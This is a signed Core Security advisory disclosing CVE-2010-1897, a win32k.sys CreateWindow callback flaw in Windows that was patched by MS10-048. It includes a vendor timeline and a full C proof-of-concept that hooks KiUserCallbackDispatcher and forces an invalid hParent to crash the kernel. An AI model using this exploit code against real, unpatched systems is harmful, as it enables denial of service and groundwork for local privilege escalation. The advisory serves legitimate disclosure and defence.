Core Security Technologies Advisory 2010.0623

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
Core Security Technologies - CoreLabs Advisory  
http://corelabs.coresecurity.com/  
  
Microsoft Windows CreateWindow function callback vulnerability  
  
  
1. *Advisory Information*  
  
Title: Microsoft Windows CreateWindow function callback vulnerability  
Advisory Id: CORE-2010-0623  
Advisory URL:  
[http://www.coresecurity.com/content/microsoft-windows-createwindow-function-callback-bug]  
Date published: 2010-08-10  
Date of last update: 2010-08-09  
Vendors contacted: Microsoft  
Release mode: Coordinated release  
  
  
2. *Vulnerability Information*  
  
Class: Input validation error [CWE-20]  
Impact: Code execution  
Remotely Exploitable: No  
Locally Exploitable: Yes  
CVE Name: CVE-2010-1897  
Bugtraq ID: 42206  
  
  
3. *Vulnerability Description*  
  
A crash due to an invalid read in the Windows kernel can be reliably  
leveraged into privileged code execution resulting in a privilege  
escalation local vulnerability. This happens because special values of  
'hParent' where not sufficiently taken into account when patching  
'xxxCreateWindowsEx' on MS010-032[1].  
  
  
4. *Vulnerable packages*  
  
At least all supported versions of Windows were reported by Microsoft  
to be vulnerable:  
  
. Windows 7  
. Windows Vista  
. Windows Server 2008 R2  
. Windows Server 2008  
. Microsoft Windows XP  
. Microsoft Windows Server 2003  
  
  
5. *Non-vulnerable packages*  
  
. Windows 7 with MS10-048  
. Windows Vista with MS10-048  
. Windows Server 2008 R2 with MS10-048  
. Windows Server 2008 with MS10-048  
. Microsoft Windows XP with MS10-048  
. Microsoft Windows Server 2003 with MS10-048  
  
  
6. *Vendor Information, Solutions and Workarounds*  
  
See Microsoft security bulletin at  
[http://go.microsoft.com/fwlink/?LinkId=194552]  
  
  
7. *Credits*  
  
This vulnerability was discovered by Nicolas Economou from Core  
Security Technologies.  
  
  
8. *Technical Description / Proof of Concept Code*  
  
There is a bug in the 'xxxCreateWindowEx' Windows kernel function,  
located in win32k.sys. This function addresses memory with a  
user-supplied (via a callback) window pseudo-handle (the 'hParent'  
parameter). This bug can be exploited by surreptitiously registering a  
callback or "hook" that will cleverly modify parameters passed by the  
kernel into userland that are then reused when returning to kernel  
from the callback.  
  
In normal execution when the 'CreateWindow' is called from userspace,  
the 'NtUserCreateWindowEx' kernel function is executed, the  
'xxxCreateWindowEx' is next in the kernel-side call stack. The later  
function then checks that the callback functions (or "hooks") where  
properly set and calls 'xxxCallHook' which then starts the dispatch  
into userland of the registered callback functions.  
  
The problem resides in the mechanism used to pass parameters back to  
the process creating the window, like for example the aforementioned  
'hParent' parameter. These parameters are passed via the stack into  
userspace, and reused by the kernel after the callback function is  
executed. If the callback function resets the 'hParent' parameter to  
pseudo-handle values like '0xffffffff' or '0xfffffffe' the kernel  
crashes (likely because validation of handle values was already done  
and was not being re-verified after executing untrusted userland code).  
  
The following code reliably crashes a fully patched version of Windows  
XP 32 bits when executed as an unprivileged user. On version  
5.1.2600.5976 of win32k.sys the crash occurs on '0xbf832763'  
('xxxCreateWindowEx') when reading from unmapped memory ('test byte  
ptr [eax+0x1c],0x8'). The value of 'eax' on the crash is '0xfffffffe',  
the supplied vulnerable 'hParent' value.  
  
/-----  
#include <windows.h>  
#include <stdio.h>  
  
#define asm __asm  
  
///////////////////////////////////////////////////////////////////////////  
  
void *KiUserCallbackDispatcher;  
  
///////////////////////////////////////////////////////////////////////////  
  
//__declspec ( naked ) void handler ( void );  
void seter ( unsigned int * );  
BOOL CALLBACK my_callback ( int , WPARAM , LPARAM );  
  
///////////////////////////////////////////////////////////////////////////  
  
char *trampoline = "\x68" // "push"  
"\x12\x34\x56\x78" // "handler address"  
"\xc3"; // "ret"  
  
///////////////////////////////////////////////////////////////////////////  
  
__declspec ( naked ) void handler ( void )  
{  
// asm int 3  
  
asm pushad  
asm push esp  
asm call seter  
asm add esp,4  
asm popad  
  
/* The first 3 "KiUserCallbackDispatcher" instructions */  
asm add esp,0x4  
asm pop edx  
asm mov eax,fs:[0x18]  
  
/* Returning to the normal code */  
asm push dword ptr [ KiUserCallbackDispatcher ]  
asm add dword ptr [esp],0x0a  
asm ret  
}  
  
///////////////////////////////////////////////////////////////////////////  
  
void seter ( unsigned int *base )  
{  
unsigned int *p = ( unsigned int * ) base;  
static int time = 1;  
  
/* If it's the correct call */  
if ( time == 1 )  
{  
/* Searching a known argument */  
while ( 1 )  
{  
/* If it's the interesting value */  
if ( *p == 0x00cf0000 )  
{  
/* If it's the hParent to be modified */  
if ( p [ 4 ] == 0 )  
{  
/* Writing the magic argument */  
p [ 4 ] = 0xfffffffe; /* <<<<<<<< BUG <<<<<<<< */  
  
/* Closing the door */  
time ++;  
}  
  
/* Leaving */  
break;  
}  
else  
{  
p ++;  
}  
}  
}  
else  
{  
time ++;  
}  
  
}  
  
///////////////////////////////////////////////////////////////////////////  
  
BOOL CALLBACK my_callback ( int algo , WPARAM wparam , LPARAM lparam )  
{  
return ( FALSE );  
}  
  
///////////////////////////////////////////////////////////////////////////  
  
int main ( int argc , char *argv [] )  
{  
unsigned int nbytes;  
unsigned int oldp;  
HHOOK hook;  
  
/* Resolving the KiUserCallbackDispatcher address */  
KiUserCallbackDispatcher = GetProcAddress ( GetModuleHandle (  
"ntdll.dll" ) , "KiUserCallbackDispatcher" );  
printf ( "%x\n" , KiUserCallbackDispatcher );  
  
/* Changing the privileges */  
VirtualProtect ( KiUserCallbackDispatcher , 1 ,  
PAGE_EXECUTE_READWRITE , &oldp );  
  
/* Fixing the trampoline */  
* ( ( unsigned int * ) &trampoline [ 1 ] ) = ( unsigned int * ) handler;  
  
/* Patching the KiUserCallbackDispatcher */  
WriteProcessMemory ( ( HANDLE ) -1 , ( void * )  
KiUserCallbackDispatcher , ( void * ) trampoline , 6 , ( DWORD * )  
&nbytes );  
  
/* Enabling the kernel callbacks */  
hook = SetWindowsHookEx ( WH_SHELL , ( HOOKPROC ) my_callback ,  
GetModuleHandle ( NULL ) , GetCurrentThreadId () );  
hook = SetWindowsHookEx ( WH_GETMESSAGE , ( HOOKPROC ) my_callback ,  
GetModuleHandle ( NULL ) , GetCurrentThreadId () );  
hook = SetWindowsHookEx ( WH_CBT , ( HOOKPROC ) my_callback ,  
GetModuleHandle ( NULL ) , GetCurrentThreadId () );  
  
/* Creating a window */  
printf ( "Creating a Window ...\n" );  
CreateWindow ( "Edit" , "Title" , WS_OVERLAPPEDWINDOW , 0 , 0 , 20 ,  
30 , NULL , NULL , NULL , NULL );  
printf ( "waiting the BSOD ...\n" );  
  
return ( 0 );  
}  
- -----/  
  
  
  
9. *Report Timeline*  
  
. 2010-06-15:  
Initial notification to the vendor. Core indicates that the patch from  
MS10-032 does not seem to fix the problem and send a PoC that work on  
fully patched systems. Asks Microsoft to determine if it is a newly  
found vulnerability or simply a quality issue with the patch issued on  
n June's Patch Tuesday.  
  
. 2010-06-16:  
Vendor acknowledges notification and says that the product team will  
look into the issue.  
  
. 2010-06-17:  
Vendor asks for a stacktrace and crash dump file to confirm that  
they're reproducing the same issue.  
  
. 2010-06-15:  
Core sends stacktrace and crash dump and asks to confirm that the bug  
could be reproduced with the PoC sent earlier.  
  
. 2010-06-17:  
Vendor confirms that the bug has been reproduced. Can't determine if  
it is a new bug, a variant of an existing one or an incomplete fix but  
expects to have more information by the 20th or 21st at the latest.  
  
. 2010-06-23:  
Update from the vendor (email sent previously bounced). The issue has  
been determined to be a variant of CVE-2010-0485. It will be addressed  
as a new bug and assigned a different CVE ID. Although the crash comes  
from the same vector (a window handle returned by a user mode windows  
hook callback) the bug is in a different function than the original  
issue and occurs due to a different, previously unknown, issue with  
the window handle that the original fix does not address. A solid  
timeline for general availability of patches is not yet available. The  
July 2010 Patch Tuesday day is mentioned as tentative but the patch  
release may slip to August.  
  
. 2010-06-23:  
Core says that its analysis coincides with the vendor's and therefore  
it will treat the issue as a new vulnerability assigning  
CORE-2010-0623 to the corresponding security advisory. The discoverer  
estimated that the issue is very likely to be exploitable. Publication  
is tentatively scheduled for July 13th, 2010 but may be postponed  
based on a firm commitment from MSRC and indication that the fix is  
lined up for testing. Core mentions that it is very likely that  
vulnerability research vendors have already found this issue and quite  
possible that exploits are already being developed. Should the  
information become public by a third-party Core will promptly publish  
its security advisory and notify the vendor.  
  
. 2010-07-23:  
Core asks Microsoft to confirm that the patch has been positively  
rescheduled to the August patch Tuesday, since no communications where  
received on the last month and July's patch Tuesday is due. Core also  
informs that reliable exploitation of this bug had been achieved and  
restates that August should be a final date because this vulnerability  
has probably been already discovered by any with technical knowledge  
to reverse engineer MS010-032. Information on affected platforms is  
also asked for to Microsoft.  
  
. 2010-07-23:  
Microsoft confirms that the patch will be issued in August 10th, for  
all supported versions of Microsoft Windows.  
  
. 2010-08-04:  
Core asks Microsoft for data regarding their future security bulletin  
in order to include it in the vendor section of this advisory.  
  
. 2010-08-04:  
Microsoft replies with the data Core asked for, and mentions that, if  
possible, they would like to see an advisory draft. Microsoft also  
asks for confirmation on credits for the acknowledgement section of  
their report.  
  
. 2010-08-04:  
Core replies with a draft of this advisory and a minor correction  
regarding an accent mark on the credits for the acknowledgement section.  
  
. 2010-08-09:  
Core sends a more polished draft for the advisory.  
  
. 2010-08-10:  
Microsoft acknowledges the advisory draft and the minor correction  
regarding the accent mark.  
  
. 2010-08-10:  
Microsoft Security Bulletin MS10-048 is published.  
  
. 2010-08-10:  
Advisory CORE-2010-0623 is published.  
  
  
10. *References*  
  
[1] Microsoft Security Bulletin MS10-032  
[http://www.microsoft.com/technet/security/bulletin/ms10-032.mspx]  
  
  
11. *About CoreLabs*  
  
CoreLabs, the research center of Core Security Technologies, is  
charged with anticipating the future needs and requirements for  
information security technologies. We conduct our research in several  
important areas of computer security including system vulnerabilities,  
cyber attack planning and simulation, source code auditing, and  
cryptography. Our results include problem formalization,  
identification of vulnerabilities, novel solutions and prototypes for  
new technologies. CoreLabs regularly publishes security advisories,  
technical papers, project information and shared software tools for  
public use at: [http://corelabs.coresecurity.com/].  
  
  
12. *About Core Security Technologies*  
  
Core Security Technologies develops strategic solutions that help  
security-conscious organizations worldwide develop and maintain a  
proactive process for securing their networks. The company's flagship  
product, CORE IMPACT, is the most comprehensive product for performing  
enterprise security assurance testing. CORE IMPACT evaluates network,  
endpoint and end-user vulnerabilities and identifies what resources  
are exposed. It enables organizations to determine if current security  
investments are detecting and preventing attacks. Core Security  
Technologies augments its leading technology solution with world-class  
security consulting services, including penetration testing and  
software security auditing. Based in Boston, MA and Buenos Aires,  
Argentina, Core Security Technologies can be reached at 617-399-6980  
or on the Web at [http://www.coresecurity.com].  
  
  
13. *Disclaimer*  
  
The contents of this advisory are copyright (c) 2010 Core Security  
Technologies and (c) 2010 CoreLabs, and are licensed under a Creative  
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)  
License: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/]  
  
  
14. *PGP/GPG Keys*  
  
This advisory has been signed with the GPG key of Core Security  
Technologies advisories team, which is available for download at  
[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].  
  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.9 (MingW32)  
Comment: GnuPT v3.6.3  
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/  
  
iEYEARECAAYFAkxhpQ0ACgkQyNibggitWa3Q7gCfVgpuM7KDIIZ30RhJ9zPCOhl+  
37IAoLMnTLUuZbvGpDlpjqmft5z0AFZ+  
=ECTt  
-----END PGP SIGNATURE-----  
`